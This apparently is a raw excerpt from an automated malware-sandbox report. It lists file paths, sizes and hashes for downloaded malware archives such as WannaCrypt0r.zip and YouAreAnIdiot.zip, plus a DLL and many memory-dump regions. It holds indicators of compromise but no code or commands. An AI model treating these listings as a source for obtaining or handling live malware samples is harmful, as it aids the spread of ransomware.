                                                                                                                                                      44481efd4f9a861444aa0aa05421a52e

                                                                                                                                                      SHA1

                                                                                                                                                      22e9b061f8fc3147dd0ec8a088a38272b0d30bcf

                                                                                                                                                      SHA256

                                                                                                                                                      7b8632db07cb8693963402624e6ad884187b23f81ec7968fba2631909d5919b2

                                                                                                                                                      SHA512

                                                                                                                                                      819cf783345751f6fb000142b59ebac5b72c8878adfaec1c9472bf242d7a469cdf21a2d89c6e292599606f19782c1951752f763bd89efed35e1b0f2d2fd52827

                                                                                                                                                    • C:\Users\Admin\Downloads\UserOverflow.zip

                                                                                                                                                      Filesize

                                                                                                                                                      564KB

                                                                                                                                                      MD5

                                                                                                                                                      e63eb8701abeafc17e18807f996a2c4b

                                                                                                                                                      SHA1

                                                                                                                                                      e11387f6c188416f43e1a72f4ffdd759f4e43e54

                                                                                                                                                      SHA256

                                                                                                                                                      7eafd43c18f9613d762567cb5e00d58df71208d6b94c23d634daec42170e0d6c

                                                                                                                                                      SHA512

                                                                                                                                                      d996ea9566a588bb30fbaeb38435026804b80770a22a1438589e86e47f13ef07187538a105613bfc907bf9a6a377805f69d9e9de071e7ae57aeb11d4ac98a136

                                                                                                                                                    • C:\Users\Admin\Downloads\WannaCrypt0r.zip

                                                                                                                                                      Filesize

                                                                                                                                                      3.3MB

                                                                                                                                                      MD5

                                                                                                                                                      e58fdd8b0ce47bcb8ffd89f4499d186d

                                                                                                                                                      SHA1

                                                                                                                                                      b7e2334ac6e1ad75e3744661bb590a2d1da98b03

                                                                                                                                                      SHA256

                                                                                                                                                      283f40e9d550833bec101a24fd6fd6fbd9937ed32a51392e818ffff662a1d30a

                                                                                                                                                      SHA512

                                                                                                                                                      95b6567b373efa6aec6a9bfd7af70ded86f8c72d3e8ba75f756024817815b830f54d18143b0be6de335dd0ca0afe722f88a4684663be5a84946bd30343d43a8c

                                                                                                                                                    • C:\Users\Admin\Downloads\Xyeta.zip

                                                                                                                                                      Filesize

                                                                                                                                                      75KB

                                                                                                                                                      MD5

                                                                                                                                                      213743564d240175e53f5c1feb800820

                                                                                                                                                      SHA1

                                                                                                                                                      5a64c9771d2e0a8faf569f1d0fb1a43d289e157c

                                                                                                                                                      SHA256

                                                                                                                                                      65f5d46ed07c5b5d44f1b96088226e1473f4a6341f7510495fe108fef2a74575

                                                                                                                                                      SHA512

                                                                                                                                                      8e6b1822b93df21dd87bf850cf97e1906a4416a20fc91039dd41fd96d97e3e61cefcd98eeef325adbd722d375c257a68f13c4fbcc511057922a37c688cb39d75

                                                                                                                                                    • C:\Users\Admin\Downloads\YouAreAnIdiot.zip

                                                                                                                                                      Filesize

                                                                                                                                                      223KB

                                                                                                                                                      MD5

                                                                                                                                                      a7a51358ab9cdf1773b76bc2e25812d9

                                                                                                                                                      SHA1

                                                                                                                                                      9f3befe37f5fbe58bbb9476a811869c5410ee919

                                                                                                                                                      SHA256

                                                                                                                                                      817ae49d7329ea507f0a01bb8009b9698bbd2fbe5055c942536f73f4d1d2b612

                                                                                                                                                      SHA512

                                                                                                                                                      3adc88eec7f646e50be24d2322b146438350aad358b3939d6ec0cd700fa3e3c07f2b75c5cd5e0018721af8e2391b0f32138ab66369869aaaa055d9188b4aa38d

                                                                                                                                                    • C:\Users\Admin\Downloads\YouAreAnIdiot\Interop.ShockwaveFlashObjects.dll

                                                                                                                                                      Filesize

                                                                                                                                                      21KB

                                                                                                                                                      MD5

                                                                                                                                                      e869d1d4545c212d9068a090a370ded3

                                                                                                                                                      SHA1

                                                                                                                                                      a6a92f108bba390cd14e7103ba710efec1d270f9

                                                                                                                                                      SHA256

                                                                                                                                                      63af704211a03f6ff6530ebfca095b6c97636ab66e5a6de80d167b19c3c30c66

                                                                                                                                                      SHA512

                                                                                                                                                      ee108b0ebefb476c5beb568129da7ce058229fb42ad3500c6fc37a36d718eb67a17b331d73f6920a5290c3977be2eda96aa057533c3344898d161cb464c6ef76

                                                                                                                                                    • C:\Users\Public\Desktop\ዽষ᠇ߓ໩᪗હᚽネ᪾ၜ⻩ⰹᑯቕಚᤛ⍡⧳Ⳬ⒐Ḃ

                                                                                                                                                      Filesize

                                                                                                                                                      666B

                                                                                                                                                      MD5

                                                                                                                                                      e49f0a8effa6380b4518a8064f6d240b

                                                                                                                                                      SHA1

                                                                                                                                                      ba62ffe370e186b7f980922067ac68613521bd51

                                                                                                                                                      SHA256

                                                                                                                                                      8dbd06e9585c5a16181256c9951dbc65621df66ceb22c8e3d2304477178bee13

                                                                                                                                                      SHA512

                                                                                                                                                      de6281a43a97702dd749a1b24f4c65bed49a2e2963cabeeb2a309031ab601f5ec488f48059c03ec3001363d085e8d2f0f046501edf19fafe7508d27e596117d4

                                                                                                                                                    • memory/200-3228-0x0000000000400000-0x000000000044F000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      316KB

                                                                                                                                                    • memory/988-1678-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1348-3721-0x0000000000220000-0x0000000000292000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      456KB

                                                                                                                                                    • memory/2028-3126-0x000000006EE80000-0x000000006EEF7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      476KB

                                                                                                                                                    • memory/2028-3220-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3121-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3122-0x000000006F170000-0x000000006F1F2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      520KB

                                                                                                                                                    • memory/2028-3173-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3125-0x000000006EF00000-0x000000006EF22000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/2028-3170-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3127-0x000000006EDF0000-0x000000006EE72000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      520KB

                                                                                                                                                    • memory/2028-3239-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3123-0x000000006F150000-0x000000006F16C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      112KB

                                                                                                                                                    • memory/2028-3283-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3286-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3217-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3124-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3072-0x000000006F170000-0x000000006F1F2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      520KB

                                                                                                                                                    • memory/2028-3073-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3074-0x000000006EDF0000-0x000000006EE72000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      520KB

                                                                                                                                                    • memory/2028-3236-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3076-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3075-0x000000006EF00000-0x000000006EF22000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/2028-3320-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3304-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2028-3307-0x000000006EF30000-0x000000006F14C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      2.1MB

                                                                                                                                                    • memory/2028-3290-0x0000000000670000-0x000000000096E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      3.0MB

                                                                                                                                                    • memory/2712-3812-0x00000000050F0000-0x00000000050FA000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                    • memory/3788-4331-0x0000000000400000-0x00000000005CC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                    • memory/3788-4509-0x0000000000400000-0x00000000005CC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                    • memory/3912-3181-0x0000000000400000-0x000000000044F000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      316KB

                                                                                                                                                    • memory/3912-3183-0x0000000000400000-0x000000000044F000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      316KB

                                                                                                                                                    • memory/4844-1335-0x0000000000FE0000-0x00000000011D2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.9MB

                                                                                                                                                    • memory/4844-1336-0x0000000005C10000-0x0000000005CAC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      624KB

                                                                                                                                                    • memory/4844-1337-0x0000000006260000-0x0000000006806000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      5.6MB

                                                                                                                                                    • memory/4844-1338-0x0000000005D50000-0x0000000005DE2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      584KB

                                                                                                                                                    • memory/4844-1339-0x0000000005D20000-0x0000000005D2A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                    • memory/4844-1340-0x0000000005F70000-0x0000000005FC6000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      344KB